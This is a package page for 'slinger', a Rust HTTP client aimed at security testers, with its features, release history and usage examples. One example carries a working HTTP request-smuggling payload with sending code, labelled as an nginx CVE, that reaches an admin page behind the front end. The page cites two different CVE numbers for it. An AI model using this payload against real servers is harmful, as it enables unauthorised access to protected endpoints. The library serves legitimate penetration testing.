15 releases
new 0.1.14 | Nov 4, 2024 |
---|---|
0.1.13 | Nov 4, 2024 |
0.1.12 | Oct 28, 2024 |
0.1.9 | Aug 15, 2024 |
0.1.2 | May 30, 2024 |
#1388 in Network programming
668 downloads per month
140KB
3K
SLoC
slinger(投石器)
An HTTP Client for Rust designed for hackers.
Explore the docs »
View Demo
·
Report Bug
·
Request Feature
About The Project
- customizable redirect policy
- http/https and socks5/socks5h proxies
- cookie store
- raw socket request
- HTTPS via tls
Getting Started
This example enables some optional features, so your Cargo.toml
could look like this:
[dependencies]
slinger = { version = "0.1.2", features = ["serde", "cookie", "charset", "tls", "gzip"] }
And then the code:
fn main() -> Result<(), Box<dyn std::error::Error>> {
let resp = slinger::get("https://httpbin.org/get")?;
println!("{:?}", resp.text());
Ok(())
}
Example
- Nginx - Http Smuggling CVE-2019-20372
use std::io::BufRead;
use slinger::{ClientBuilder, HTTPRecord};
/// CVE-2020-11724
/// when you're using BurpSuite proxy need **disabled** "set **Connection** header on incoming request"
const RAW: &[u8] = b"GET /test1 HTTP/1.1
Host: 192.168.83.196:8081
Content-Length: 42
Transfer-Encoding: chunked
0
GET /test1 HTTP/1.1
Host: 192.168.83.196:8081
X: GET http://192.168.83.1:8080/admin.jsp HTTP/1.0
";
fn main() -> Result<(), Box<dyn std::error::Error>> {
// let proxy = slinger::Proxy::parse("http://127.0.0.1:8080").unwrap();
let client = ClientBuilder::new().build().unwrap();
let mut raw = Vec::new();
// replace \n to \r\n
for line in RAW.lines() {
match line {
Ok(l) => {
raw.extend(l.as_bytes());
raw.extend(b"\r\n")
}
Err(err) => {
println!("{:?}", err);
}
}
}
let resp = client.raw("http://127.0.0.1:9015/", raw, true).send()?;
let record = resp.extensions().get::<Vec<HTTPRecord>>().unwrap();
println!("{:?}", record);
Ok(())
}
For more examples, please refer to the example
Contributing
Contributions are what make the open source community such an amazing place to learn, inspire, and create. Any contributions you make are greatly appreciated.
If you have a suggestion that would make this better, please fork the repo and create a pull request. You can also simply open an issue with the tag "enhancement". Don't forget to give the project a star! Thanks again!
- Fork the Project
- Create your Feature Branch (
git checkout -b feature/AmazingFeature
) - Commit your Changes (
git commit -m 'Add some AmazingFeature'
) - Push to the Branch (
git push origin feature/AmazingFeature
) - Open a Pull Request
License
Distributed under the GPL-3.0-only
License. See LICENSE
for more information.
Contact
Your Name - @Kali_Team - root@kali-team.cn
Project Link: https://github.com/emo-crab/slinger
Acknowledgments
Dependencies
~1–12MB
~170K SLoC